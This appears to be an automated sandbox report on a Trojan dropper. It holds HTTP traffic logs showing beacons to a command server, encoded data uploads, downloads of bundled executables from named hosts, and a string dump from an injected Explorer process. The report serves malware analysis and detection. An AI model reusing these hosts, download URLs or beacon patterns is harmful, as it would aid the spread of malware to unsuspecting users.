Content-Length: 0


POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030

POST /fail.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUIyMDBFNEQ5MkU5RjlEN0UzQjI1NTYxMzcwMzQxOTczMTdCQzQ1MjI5QjNCODhBNTgzRjExRTk3NzFBOTRCMUE= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0


POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030

POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030

POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030

POST /cgi-bin-py/weather_install.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=6F9B7B0CEF0C4cfbA767D8D91B5F4982
User-Agent: HTTP_CLIENT
Host: VVV.thedesktopweather.com
Content-Length: 430
Connection: Keep-Alive

--6F9B7B0CEF0C4cfbA767D8D91B5F4982
Content-Disposition: form-data; name="ufile01"; filename="boundary"
Content-Type: application/octet-stream

/x..g^[email protected]..>./..)<.Bq..mb.YoJ~..#=.DuT.v*..n^tP.~y.T,...5..y^bP.rd..aC.ex.Hy.=P.9r..aZ. 4.P(% ..wk.E
.&&.(N....f..oT.1(.P(M`B. $..aZ.8;.H0^.B.((.a..5...(F5P.zx.N78.9?.P(. ..k$.X&T.v(..x.lH. (..7..1x.Hg. ..h~.R7).1=..(.3=1E38566

--6F9B7B0CEF0C4cfbA767D8D91B5F4982--

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Tue, 03 May 2016 01:56:00 GMT
Server: Apache
Content-Length: 7
Connection: keep-alive
success....



POST /cgi-bin-py/weather_install.cgi HTTP/1.1

Content-Type: multipart/form-data; boundary=C5252C36FEFA4de894DB8DCC11B86612
User-Agent: HTTP_CLIENT
Host: VVV.thedesktopweather.com
Content-Length: 425
Connection: Keep-Alive

--C5252C36FEFA4de894DB8DCC11B86612
Content-Disposition: form-data; name="ufile01"; filename="boundary"
Content-Type: application/octet-stream

/x..g^[email protected]..>./..)<.Bq..mb.YoJ~..#=.DuT.v*..n^tP.~y.T,...5..y^bP.rd..aC.ex.Hy.=P.9r..aZ. 4.P(% ..wk.E
.&&.(N....f..oT.1(.P(M`B. $..aZ.8;.H0^.B.((.a..5...(F5P.zx.N78.9?.P(. ..k$.X&T.v(..x.lH. (..7..1x.Hg. ..h~.R7D.)'=1E38566

--C5252C36FEFA4de894DB8DCC11B86612--

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Tue, 03 May 2016 01:56:00 GMT
Server: Apache
Content-Length: 7
Connection: keep-alive
successHTTP/1.1 200 OK..Content-Type: text/plain..Date: Tue, 03 May 20
16 01:56:00 GMT..Server: Apache..Content-Length: 7..Connection: keep-a
live..success
....



POST /cgi-bin-py/weather_install.cgi HTTP/1.1

Content-Type: multipart/form-data; boundary=2F3412807F844ce0BD3A3602E56090DD
User-Agent: HTTP_CLIENT
Host: VVV.thedesktopweather.com
Content-Length: 474
Connection: Keep-Alive

--2F3412807F844ce0BD3A3602E56090DD
Content-Disposition: form-data; name="ufile01"; filename="boundary"
Content-Type: application/octet-stream

/x..g^[email protected]..>./..)<.Bq..mb.YoJ~..#=.DuT.v*..n^tP.~y.T,...5..y^bP.rd..aC.ex.Hy.=P.9r..aZ. 4.P(% ..wk.E
.&&.(N....f..oT.1(.P(M`B. $..aZ.8;.H0^.B.((.a..5...(F5P.t}.L,...)..e.*..!(..oT.;-..e.*-.rg.SaL.dx.Hz.<..oD.M&T.v)...`..~(..1..&#.P(Ll^.os.EaL.05..f./..}c.I0..v'.=1E38566

--2F3412807F844ce0BD3A3602E56090DD--

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Tue, 03 May 2016 01:56:03 GMT
Server: Apache
Content-Length: 7
Connection: keep-alive
successHTTP/1.1 200 OK..Content-Type: text/plain..Date: Tue, 03 May 20
16 01:56:03 GMT..Server: Apache..Content-Length: 7..Connection: keep-a
live..success..


POST /begin.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUIyMDBFNEQ5MkU5RjlEN0UzQjI1NTYxMzcwMzQxOTczRjUxNUI4REIxM0Q4OUQ2MEIzMUM2RTQ4NDU4MkI2MjREOTVFRjI5QTQ0NTg0OUYwNjgyRkVFQjdFMkU4OTNFMg== HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0


GET /Setup/51486_a.xml HTTP/1.0
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: wsxc123.cc
Accept: */*
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2016 09:49:48 GMT
Accept-Ranges: bytes
ETag: "0466bcf209ad11:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2016 01:55:49 GMT
Connection: keep-alive
Content-Length: 35506

<<< skipped >>>

GET /offer/YeaPlayer_br_IBD_Bundle.exe HTTP/1.0

User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: down.hejie123.com
Accept: */*
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 19 Apr 2016 08:58:04 GMT
Accept-Ranges: bytes
ETag: "0764a95199ad11:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2016 01:55:52 GMT
Connection: keep-alive
Content-Length: 600312

<<< skipped >>>

POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030

<<< skipped >>>

POST /anzhuang.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDMzMUQzQ0VBQTM1RUNEMDQ2MkQ0Q0Q3MjA5QzgzMTI2NzUwN0E1M0FGRkQ4RjlEMTk1OTVDNDg1MDUwMTkwMEFGNDc2OTBGOUUzMUU3NTREMTE3RkJBM0I4RDA0NkE5QjA= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0


POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030

<<< skipped >>>

POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030

<<< skipped >>>

POST /reportInstall.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUVBQkJBMzMzMzEwNjZEMjZGQzNDMkMwREI0MTIwQ0ZGNTEyM0U1Q0FDODhFRjdFN0MxNEE5NkY3NzMxQUNEQTY5RTY0MTEwOEI5MDkyQzg5ODE1NDcxQTQwMUFBRkYxRTFBRDFBOTYyMkZBRkVBMzI4MERBQUNDQ0Y2MTk3OUY3NjRFM0FGNzZFMzc4M0Q1MjJBM0YyRDMzNTBEMDY4MjI= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0


POST /cgi-bin-py/calendar_install.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=C528ED7CB09146c38C186BBBE233AE4A
User-Agent: BDI18N
Host: VVV.theadvancedcalendar.com
Content-Length: 468
Connection: Keep-Alive

--C528ED7CB09146c38C186BBBE233AE4A
Content-Disposition: form-data; name="ufile01"; filename="boundary"
Content-Type: application/octet-stream

/x..g^[email protected]..>./..)<.Bq..mb.YoJ~..#=.DuT.v*..n^tP.zf.N'..vv..c.lH..$..oT.-).P(.vD.7(.NaL.
?.:f.7..gh.
4.(...n. P.9|.RaL.ft.D:R.C.#3.a..:x.H;L}A.f&.S7..!).Pq^..._(......j.?a$.<.-N.L
'.%j.S=>;C.P_.Q.=.ix.Hc.=..wf.X*..;>.H0^~P.9e.D...&x.H(Pl..ko..a..86..d.:..w(.]=1E38566

--C528ED7CB09146c38C186BBBE233AE4A--

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Tue, 03 May 2016 01:56:07 GMT
Server: Apache
Content-Length: 7
Connection: keep-alive
successHTTP/1.1 200 OK..Content-Type: text/plain..Date: Tue, 03 May 20
16 01:56:07 GMT..Server: Apache..Content-Length: 7..Connection: keep-a
live..success..


POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030

<<< skipped >>>

GET /CalendarTool_Setup_En_pure_Release_calendarbase[2015-12-25.16.42].exe HTTP/1.1
User-Agent: HTTP_CLIENT
Host: download.intechnical.online
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 03 May 2016 01:56:01 GMT
Server: PWS/8.1.36
X-Px: rf-ht h0-s1105.v0-mow ( h0-s1170.v0-mow), ht-d h0-s1170.v0-mow.cdngp.net
ETag: "a612003-5bb3c8-529aa33cff880"
Cache-Control: max-age=604800
Expires: Sun, 08 May 2016 19:41:41 GMT
Age: 108860
Accept-Ranges: bytes
Content-Length: 6009800
Content-Type: application/x-msdownload
Last-Modified: Tue, 19 Jan 2016 06:44:34 GMT
Connection: keep-alive

<<< skipped >>>

POST /iplookup/iplookup.php HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: int.dpool.sina.com.cn


HTTP/1.1 200 OK
Server: Tengine
Date: Tue, 03 May 2016 01:55:47 GMT
Content-Type: text/html; charset=gbk
Content-Length: 20
Connection: close
DPOOL_HEADER: tyr106
SINA-LB:aGEuMTE4LmcyLnlmLmxiLnNpbmFub2RlLmNvbQ==
SINA-TS:OWJmMjk2Y2UgMCAwIDAgNSAwCg==
1.-1.-1...............


POST /anzhuang.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDM0QTgwQkI4OUI1QTIxODYwRjFBQjM1RjIwMThCOUYyMTkzQjZFODExM0U2MENDMjc5NERDNDQwM0EzNzVGNzZCODJCODdDRUJGMkEwNUEwQjU4MDVBMzYxRjE5QkFBRkY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0


POST /xiezai.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY4QzMwQkJBRUIwNzA1QTEyNzBDM0RFQTk1OTJDN0ZCMzdDQTY3QzRGN0I0RDA2NDAzMzc0M0IyRTYzQjk0OTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:56:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0


POST /down.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUIyMDBFNEQ5MkU5RjlEN0UzQjI1NTYxMzcwMzQxOTczMEIwNkU4RDJCMTk4QUU0QUNBQkQxQzM1RTA0QzVBQzU= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0


POST /cgi-bin-py/calendar_install.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=26BC8369D6944cca92B4EAA85508054A
User-Agent: BDI18N
Host: VVV.theadvancedcalendar.com
Content-Length: 450
Connection: Keep-Alive

--26BC8369D6944cca92B4EAA85508054A
Content-Disposition: form-data; name="ufile01"; filename="boundary"
Content-Type: application/octet-stream

/x..g^[email protected]..>./..)<.Bq..mb.YoJ~..#=.DuT.v*..n^tP.zf.N'..vv..c.lH..$..oT.-).P(.vD.7(.NaL.
?.:f.7..gh.
4.(...n. P.9|.RaL.ft.D:R.C.#3.a..:x.H;L}A.f&.S7..!).Pq^...ok.L...=4.P(Ml^.tf..5..v`.H&^>..~d.n"..v`..o.;..~r..oT.-*.H0^(..wU.N0..86..o.'..fw=1E38566

--26BC8369D6944cca92B4EAA85508054A--

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Tue, 03 May 2016 01:56:05 GMT
Server: Apache
Content-Length: 7
Connection: keep-alive
successHTTP/1.1 200 OK..Content-Type: text/plain..Date: Tue, 03 May 20
16 01:56:05 GMT..Server: Apache..Content-Length: 7..Connection: keep-a
live..success..


POST /open/51486.ini HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: wsxc123.cc


HTTP/1.1 405 Method Not Allowed
Allow: GET, HEAD, OPTIONS, TRACE
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2016 01:55:49 GMT
Connection: close
Content-Length: 1202
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=gb2312"/>..<title>405 - ..
.................. HTTP ......</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>..........</h1></div>
;..<div id="content">.. <div class="content-container"><
;fieldset>.. <h2>405 - .................... HTTP ......</
h2>.. <h3>..................................................
..(HTTP ....)..</h3>.. </fieldset></div>..</div&g
t;..</body>..</html>....

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

Explorer.exe_660:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
BROWSEUI.dll
GDI32.dll
KERNEL32.dll
NTDLL.DLL
msvcrt.dll
ole32.dll
OLEAUT32.dll
SHDOCVW.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
UxTheme.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system
ExplorerStartMsgLoop
xpsp2res.dll
xpsp3res.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\StartMenu
Software\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\StartPanel
kernel32.dll
GetSystemWindowsDirectoryW
NetGetJoinInformation
WINMM.dll
SETUPAPI.dll
WINSTA.dll
OLEACC.dll
USERENV.dll
ntdll.dll
RegEnumKeyExW
RegNotifyChangeKeyValue
RegOpenKeyExA
RegEnumKeyW
RegCloseKey
RegCreateKeyW
RegQueryInfoKeyW
RegOpenKeyExW
RegCreateKeyExW
OffsetViewportOrgEx
GetViewportOrgEx
SetViewportOrgEx
SetProcessShutdownParameters
GetProcessHeap
GetWindowsDirectoryW
CreateIoCompletionPort
ShellExecuteExW
SHRegCloseUSKey
SHRegCreateUSKeyW
AssocQueryKeyW
SHRegOpenUSKeyW
SHDeleteKeyW
TileWindows
ExitWindowsEx
RegisterHotKey
UnregisterHotKey
EnumChildWindows
GetKeyState
GetAsyncKeyState
CascadeWindows
MsgWaitForMultipleObjects
EnumWindows
explorer.pdb
name="Microsoft.Windows.Shell.explorer"
version="5.1.0.0"
<description>Windows Shell</description>
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
rundll32.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
::{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}
::{2559a1f2-21d7-11d4-bdaf-00c04f60b9f0}
::{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0}
::{2559a1f0-21d7-11d4-bdaf-00c04f60b9f0}
::{2559a1f1-21d7-11d4-bdaf-00c04f60b9f0}
::{D20EA4E1-3957-11d2-A40B-0C5020524153}
::{2559a1f7-21d7-11d4-bdaf-00c04f60b9f0}
{208D2C60-3AEA-1069-A2D7-08002B30309D}
{20D04FE0-3AEA-1069-A2D8-08002B30309D}
Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites
{450D8FBA-AD25-11D0-98A8-0800361B1103}
CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}
Software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
Software\Microsoft\Windows\CurrentVersion\Explorer\DontShowMeThisDialogAgain
Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\CleanupWiz
\\.\WMIDataDevice
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Software\Microsoft\Windows NT\CurrentVersion\Windows
ExplorerIsShellMutex
desk.cpl
Software\Microsoft\Windows\CurrentVersion\Explorer
tourstart.exe
tourstart.exe,0
Microsoft.OfferTour
WINWORD.EXE
Software\Microsoft\Windows\CurrentVersion\Applets
Software\Microsoft\Windows\CurrentVersion\Applets\Tour
explorer.exe,9
Microsoft.FixScreenResolution
shell:::{2559a1f4-21d7-11d4-bdaf-00c04f60b9f0}
Software\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation
Software\Microsoft\Windows NT\CurrentVersion
shell:::{2559a1f5-21d7-11d4-bdaf-00c04f60b9f0}
Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
DDEEXECUTESHORTCIRCUIT
http\shell
IEXPLORE.EXE
Software\Microsoft\Windows\CurrentVersion\Explorer\Streams\Desktop
Software\Microsoft\Windows\CurrentVersion\RunOnceEx
comctl32.dll
Software\Microsoft\Windows\Internet Settings
AutoConfigURL
system.ini
AppEvents\Schemes\Apps\.Default\%s\.current
Software\Microsoft\Windows\CurrentVersion\Explorer\TrayNotify
MSShellRunDlgReady
res://mys.dll/mys.hta /explorer
mshta.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\Welcome
Software\Microsoft\Windows\CurrentVersion\Explorer\Tips
SOFTWARE\Policies\Microsoft\Windows NT\CurrentVersion\MYS
cys.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\srvWiz
install.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel
OUTLOOK.EXE
explorer.exe,16
iernonce.dll
WININET.DLL
UpdateURL
WindowsUpdate
HWND%x
Software\Microsoft\Windows\CurrentVersion\OemStartMenuData
fldrclnr.dll,Wizard_RunDLL
iexplore.exe
winbrand.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\Remote\%d
shell32.dll
nusrmgr.cpl ,initialTask=ChangePicture
NewExeName
Windows
ediskeer.dll
timedate.cpl
Software\Microsoft\Windows\CurrentVersion\Explorer\Comdlg32\LastVisitedMRU
Software\Microsoft\Windows\CurrentVersion\Explorer\Comdlg32\OpenSaveMRU
Software\Microsoft\Windows\CurrentVersion\Explorer\Doc Find Spec MRU
Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Software\Microsoft\Internet Explorer\TypedURLs
%ALLUSERSPROFILE%\Start Menu\Programs\Accessories\Calculator.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Games\Solitaire.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Accessories\Paint.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Accessories\WordPad.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Accessories\System Tools\Files and Settings Transfer Wizard.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Accessories\Windows Movie Maker.lnk
%USERPROFILE%\Start Menu\Programs\Accessories\Tour Windows XP.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Windows Messenger.lnk
%USERPROFILE%\Start Menu\Programs\Windows Media Player.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\MSN.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Get Online with MSN.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Get Going with Tablet PC.lnk
%ALLUSERSPROFILE%\Start Menu\Set Program Access and Defaults.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Windows Journal.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Accessories\Media Center\Media Center.lnk
%USERPROFILE%\Start Menu\Programs\Internet Explorer.lnk
Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel
TSAppCMP.DLL
netapi32.dll
%SystemRoot%\system32\restore\rstrui.exe
RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL ?0x%X?%s
RunDLL32.EXE
%s%d%s
Software\Microsoft\Windows\CurrentVersion\Policies\System
settings.dll
explorer.exe "
explorer.exe /e, "
WindowsLogon
WindowsLogoff
%s %s
Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count
uAppWiz.Cpl
\explorer.exe
Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu
